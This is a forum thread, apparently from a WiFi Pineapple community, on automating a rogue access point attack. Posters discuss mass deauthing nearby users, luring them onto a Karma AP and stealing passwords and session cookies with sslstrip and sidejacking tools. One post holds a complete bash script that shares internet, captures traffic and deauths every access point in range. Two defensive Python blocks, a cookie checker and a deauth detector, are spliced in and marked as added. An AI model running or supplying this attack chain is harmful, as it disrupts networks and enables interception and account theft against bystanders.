diggler Posted December 14, 2011 (edited)

1. Is it true that we can use the airdrop-ng tool to deauth at the same time, on the same wireless adapter, that we are sharing internet from (ex. wlan0/mon0)?

2. Depending on the answer either A or B will be the better hardware setup.

A
- laptop with BT5R1 physically installed on entire disk
- connect to internet with wlan0 (built in laptop wireless adapter)
- deauth with wlan1 (USB wireless adapter -- ALFA)
- connect to AP51 MK3 with eth0 (built in laptop wired adapter)

or B
- laptop with BT5R1 physically installed on entire disk
- connect to internet with wlan0 (built in laptop wireless adapter)
- deauth with wlan0 (at the same time with same wireless adapter)
- connect to AP51 MK3 with eth0 (built in laptop wired adapter)

3. I'd like to combine a number of scripts to function with this type of hardware / software setup. What I'm thinking is:
- first get internet going on the laptop (wicd or command based)
- run master script (wp3 on steroids)
- have all tools, besides karma, run off of BT5R1 (why? because of hardware storage/power/dependency restrictions/limitations)
- mk3 pineapple WEBGUI still very handy for watching connection / association / dhcp logs etc
- get the wp3.sh script to autostart karma
- in new steroid script setup:
  xterm used for window control
  ferret and hamster for sidejacking
  sslstrip for https
  dsniff for all other username/passwords (or ettercap)
  urlsnarf to monitor visited urls
  driftnet for fun
  firefox needs to be configured with a proxy of 127.0.0.1:1234
  url for hamster server is http://hamster
- tell these tools in a new script to log in a new folder on the desktop (or wherever) to make it easier to find all the new data instead of having to browse diff DIRs per tool

4. I like the functionality these scripts offer, but they'll need some modification
- http://www.backtrack-linux.org/forums/backtrack-5-experts-section/45123-another-script-sidejacking-%5Bsidejackssl-sh%5D.html
- http://teh-geek.com/?p=565
- itsm0ld's script
- obviously add as much of this to wp3.sh in the right order of operations

5. Goal being, connect all HW, turn on laptop, get an internet connection, run one script (or two), follow prompts and start watching the goodness.

6. What seems messy in all these scripts is the different IPTABLE rules for each one. I think the only rule that would need to be added to wp3.sh is the SSLSTRIP one:
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:8080

7. have a terminal pop-up so you can launch airdrop-ng deauth when ready
- autolaunch terminal with Darren's airdrop-ng script for mass deauth except us (but make sure we still have to hit enter, in case we don't want or need to do this off the bat)
touch deauth.conf
nano deauth.conf
a/00:00:00:00:00:00|any <-- mac of our AP51 AP
d/any|any
airdrop-ng -i mon0 -t cap-01.csv -r deauth.conf

8. assume that if the script was written now that BT5R1 had just had an apt-get update; apt-get upgrade -y done on it. updates sslstrip to .9 latest and all the tools to what we need i believe

Edited December 14, 2011 by diggler
Mr-Protocol Posted December 14, 2011

1) pretty sure no
2) A
3) A bit overkill, I only load the tools I need at that time.
4) Add it, modify it, it's open source; I can almost guarantee you will run into issues though.
5) Cool
6) So modify it if you want it there. I might want to suggest man iptables
7) Easy enough to do inside a script, google if you don't know how.
8) Don't get what you are saying on this one. But I have a script to update BT5 and Metasploit and S.E.T. I made.
diggler (author) Posted December 14, 2011 (edited)

1. Why is there a deauth tool on the pineapple WEBGUI then? Because people are connecting through it sharing internet access but we have the ability to deauth at the same time through it...

3. Agreed : / got a little carried away there... I would really like SSLSTRIP/DSNIFF/FERRET+HAMSTER to run off the bat (with airdrop-ng deauth option quickly accessible). Someone's already expressed some interest to help, so I'll post what is created in time.

Edited December 14, 2011 by diggler
Mr-Protocol Posted December 14, 2011

I don't understand the need for side-jacking if you are using SSL Strip and can see Unames and Pwords.
diggler (author) Posted December 14, 2011 (edited)

Most people don't login to FB, GMAIL, ETC... their cookies do it for them. The chance that you catch someone logging in is lower than scraping cookies while they're browsing, especially in a deauth scenario.

Edited December 14, 2011 by diggler
Mr-Protocol Posted December 14, 2011

Most users probably have saved passwords in browser. And it's not like you need instant access to their facebook via cookie anyways.
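For the sslstrip and cookie-sidejacking discussion in the posts above, a defender-side check (added example, not code from the thread): it parses raw HTTP response headers and reports whether a session cookie would travel in the clear to an open AP and whether HSTS would stop a browser from following a downgraded http:// link. The header samples and the session-name hints are constructed.

```python
"""Defender-side check for the sslstrip / cookie-sidejacking scenario above.
Added example, not from the thread; header samples below are constructed."""

# Constructed name fragments used to guess which cookies carry a session.
SESSION_HINTS = ("sess", "sid", "auth", "token", "login")

def parse_set_cookie(value):
    """One Set-Cookie value -> dict of name and attribute flags."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    return {
        "name": name,
        "secure": "secure" in attrs,        # only sent over HTTPS
        "httponly": "httponly" in attrs,    # not readable by page scripts
        "session": any(h in name.lower() for h in SESSION_HINTS),
    }

def analyze_headers(raw):
    """Walk raw response headers; collect cookies and the HSTS flag."""
    report = {"hsts": False, "cookies": []}
    for line in raw.splitlines():
        if ":" not in line:
            continue                      # status line or blank
        key, value = line.split(":", 1)
        key = key.strip().lower()
        if key == "set-cookie":
            report["cookies"].append(parse_set_cookie(value))
        elif key == "strict-transport-security":
            report["hsts"] = True
    return report

def exposed_session_cookies(raw):
    """Session cookies a plain http:// request would carry in the clear."""
    return [c["name"] for c in analyze_headers(raw)["cookies"]
            if c["session"] and not c["secure"]]

def findings(raw):
    """Human-readable exposures; an empty list means hardened."""
    rep = analyze_headers(raw)
    out = []
    if not rep["hsts"]:
        out.append("no HSTS: browser will follow a downgraded http:// link")
    for c in rep["cookies"]:
        if not c["session"]:
            continue
        if not c["secure"]:
            out.append(f"session cookie {c['name']!r} lacks Secure flag")
        if not c["httponly"]:
            out.append(f"session cookie {c['name']!r} lacks HttpOnly flag")
    return out

# Constructed sample responses: the weak setting beside the corrected one.
WEAK_RESPONSE = """HTTP/1.1 200 OK
Set-Cookie: sessionid=abc123; Path=/
Set-Cookie: theme=dark; Path=/
Content-Type: text/html"""

HARDENED_RESPONSE = """HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax
Set-Cookie: theme=dark; Path=/
Content-Type: text/html"""

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, findings(raw) or ["ok"])
```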
telot Posted December 15, 2011

This is right up my alley. I too want the "deauth everything around me then karma everyone to me and allow for remote gui/terminal access by me" process via scripting - but I want it done automatically at boot up. What I'm looking for is the perfect Svartkast/dropbox (see http://www.irongeek.com/i.php?page=videos/derbycon1/adrian-crenshaw-building-a-svartkast-cheap-hardware-to-leave-behind-on-someone-elses-network for terminology and the basic premise).

My noob brain encounters this problem: If you iwconfig a stock pineapple, you'll see mon.wlan0 - this is locked on channel 11 by default, thereby removing your ability to deauth people on any channel but 11 without bringing down this interface (airmon-ng stop mon.wlan0). So if you want to do the whole "deauth everyone around me", at bootup you'd have to either stop mon.wlan0 (no idea what this actually does/haven't figured it out yet) every time, or somehow prevent it from starting at bootup, then start airmon-ng on wlan0, do an airodump-ng that pipes all the BSSIDs and channels in range into your startup script, then airmon-ng stop mon0, restart it on those channels and deauth the BSSIDs one channel/bssid at a time. After everyone's deauth'd, you then bring mon.wlan0 back up (assuming Jasager somehow needs it) and start up karma. Then begin tcpdump/wireshark capturing for later consumption via scp.

I plan to accomplish this with a Raspberry Pi (raspberrypi.org) but need to first confront the major issue of - by the time it deauths any and all APs around it, won't people have rejoined their network? The deauth tests I've run against my crappy netgear router work only if I deauth with an external (not on pineapple) monitor mode enabled wifi adapter. When I deauth with the pineapple, it takes too long for the pineapple to get mon.wlan0 back up and running - my test laptop has already reconnected to my crap netgear. More tests with different routers need to be done for my results to be conclusive, and I need to find out what mon.wlan0 is all about...but the idea of a small box I can drop anywhere that houses a credit card sized computer and a pineapple that in total costs $70 is too amazing to pass up.
diggler (author) Posted December 15, 2011

I apologize in advance, this will be a short reply because I'm on my phone. If you invest in a different hardware setup, where you have two wireless adapters (ex wlan0 and wlan1) and 1 ethernet adapter, you can use one to connect to the internet, one to run pineapple and karma and the spare wlan1 to issue deauths.
Sebkinne Posted December 15, 2011

I am unsure whether it has been mentioned, but the pineapple can deauth clients for you. It can do so even when running karma. However, deauth is not working correctly through the pineapple interface; a fix has already been done and will be in the next firmware.

Best,
Sebkinne
diggler (author) Posted December 15, 2011 (edited)

I didn't know that, but it makes a big difference in how I'm thinking of setting up my system. Can you explain why that's possible on the wireless interface of the pineapple and not the ALFA USB interface? Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread? Many thanks Seb... Cheers...

Edited December 15, 2011 by diggler
wcs Posted December 15, 2011

(quoting diggler) "Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread?"

I think most people (well I am and the pineapple but he's broken right now) are using aireplay-ng

If you haven't seen this thread, check it out! http://www.rx8club.com/showthread.php?t=180037 Seriously, it's interesting, grab a coke or a beer, something.
diggler (author) Posted December 15, 2011

Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB.
telot Posted December 15, 2011

(quoting diggler) "Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB."

Here's the deal as I understand it Diggler - at current time, you can't deauth as you want to using the Pineapple. The *best* way to do it with current firmware is to have an alfa usb attached to your computer to do the deauths in addition to the pineapple running that will then offer up karma'd APs to the kicked off victims. However, this all could change with Seb's mysterious new firmware - Seb, do you have an ETA on delivery of your new firmware? You rock man, can't wait to see what you have in store for us...maybe a little preview/changelog? :) Hope this helps

telot
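On the detection side of the deauth-then-Karma flow the posts above describe, an added example (not code from the thread or the Pineapple project): two simple detectors run over constructed monitor-mode frame records, a sliding-window deauth burst counter per transmitter and a check for one BSSID answering probes for many different SSIDs, which is what a Karma-style AP looks like from the outside. Thresholds, MAC addresses and SSIDs are all constructed.

```python
"""Detection side of the deauth-then-Karma flow discussed in this thread.
Added example, not from the thread. Frame records are constructed dicts;
a live feed (tshark, scapy) is not used so this runs offline."""
from collections import defaultdict, deque

# Constructed thresholds; tune to the environment.
DEAUTH_THRESHOLD = 20      # deauth frames from one transmitter per window
DEAUTH_WINDOW_S = 5.0      # sliding window length in seconds
KARMA_SSID_THRESHOLD = 5   # distinct SSIDs one BSSID answers for

def detect_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window=DEAUTH_WINDOW_S):
    """Return {transmitter: first_alert_ts} for deauth bursts.

    A normal AP sends the occasional deauth; a tool kicking every client
    in range sends tens per second from one address."""
    recent = defaultdict(deque)
    alerts = {}
    for f in sorted(frames, key=lambda x: x["ts"]):
        if f["type"] != "deauth":
            continue
        q = recent[f["src"]]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:   # drop frames outside window
            q.popleft()
        if len(q) >= threshold and f["src"] not in alerts:
            alerts[f["src"]] = f["ts"]
    return alerts

def detect_karma_responders(frames, threshold=KARMA_SSID_THRESHOLD):
    """Return {bssid: [ssids]} for transmitters advertising many SSIDs.

    Karma answers any probe request, so one BSSID is seen offering
    every network nearby clients have ever remembered."""
    ssids = defaultdict(set)
    for f in frames:
        if f["type"] in ("beacon", "probe_resp") and f.get("ssid"):
            ssids[f["src"]].add(f["ssid"])
    return {b: sorted(s) for b, s in ssids.items() if len(s) >= threshold}

# Constructed capture: a legitimate AP beaconing one SSID, then a burst of
# 30 deauths from 02:00:00:00:00:aa, then that address answering probes
# for six different SSIDs. All addresses and SSIDs are made up.
LEGIT_AP = "00:11:22:33:44:55"
ROGUE = "02:00:00:00:00:aa"
SAMPLE = [{"ts": 0.5 * i, "type": "beacon", "src": LEGIT_AP, "ssid": "HomeNet"}
          for i in range(20)]
SAMPLE += [{"ts": 2.0 + 0.1 * i, "type": "deauth", "src": ROGUE,
            "dst": "ff:ff:ff:ff:ff:ff"} for i in range(30)]
SAMPLE += [{"ts": 6.0 + i, "type": "probe_resp", "src": ROGUE, "ssid": s}
           for i, s in enumerate(["HomeNet", "attwifi", "linksys",
                                  "CoffeeShop", "xfinitywifi", "Airport_Free"])]

if __name__ == "__main__":
    print("deauth bursts:", detect_deauth_bursts(SAMPLE))
    print("karma-like responders:", detect_karma_responders(SAMPLE))
```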
d1000 Posted January 27, 2013

Hi! Any news on this thread? Also looking for a setup that can make my raspberry a power-on deauth everyone near my pineapple. Does anyone have this working? Power it on and voilaááááá!
telot Posted January 27, 2013 (edited)

Here's a script I made way back in 2011. It was meant to be used with the mark3, but I don't think anything has changed. This script makes some assumptions about your setup that you should verify/modify - it's all mentioned in the first blurb of commented text. Hope it helps

#!/bin/sh
#telot presents....:::drum roll:::
#One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!
#Note that this script makes quite a few assumptions. They are:
#You are using backtrack5R1.
#Your interface that is connecting to the internet is wlan0
#Your interface that is connecting to the pineapple is eth0
#You have a alfa realtek usb card capable of monitor mode plugged in.
#You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script).
#You have not run wp3.sh or any other network configuration stuff.
#You have your pineapple configured to autostart karma at bootup.
#This script is meant to run on your laptop upon bootup.
#
#Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.
#So the internet I'm serving up in my pentest lab is actually run through my cellphone.
#So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.
#
#
#Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah
#
#
#I'm keeping most configuration and capture files on the desktop for ease.
cd /root/Desktop/
#Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line.
#iwconfig wlan0 essid EssidOfAPyouWantToUse
wpa_supplicant -B -Dwext -i wlan0 -c Jack.conf
dhclient wlan0
#Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.
#Bring up Ethernet Interface directly connected to Pineapple
ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up
# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
cat /proc/sys/net/ipv4/ip_forward
#clear chains and rules
iptables -X
iptables -F
echo iptables chains and rules cleared
#setup IP forwarding
iptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo IP Forwarding Enabled
#remove default route
route del default
echo Default route removed
#add default gateway
route add default gw 192.168.1.1 wlan0
echo Pineapple Default Gateway Configured
#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
ping -c3 172.16.42.1
if [ $? -eq 0 ]; then
echo "ICS configuration successful."
#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
#echo "Enter Pineapple password if prompted"
#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
fi
echo ""
echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"
echo ""
#Now on to the fun stuff!
#
#
#
#Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.
#Remember to screen -r back to it and get rid of it when you're done.
screen -d -m wireshark -i eth0 -k -w sharkcap &
#This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).
#This is also created in a detached screen. So remember to cleanup when you're done!
#
#
#Now we deauth every access point around us. Make sure to set a conf file (in my case, I call it yourescrewed.conf) for airdrop with your allows and denys.
#I set mine to allow the pineapple & my hotspot and deny everyone else.
ifconfig wlan1 up
airmon-ng start wlan1
cd /pentest/wireless/airdrop-ng/
screen -d -m airodump-ng mon0 -w capfile --output-format csv
sleep 20
python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf

telot

Edited January 27, 2013 by telot
d1000 Posted January 29, 2013

Many thanks!
telot Posted January 29, 2013

Ooo! I have the best answer? Mr. P, where do I find the reward pastries? ;) Glad I could help

telot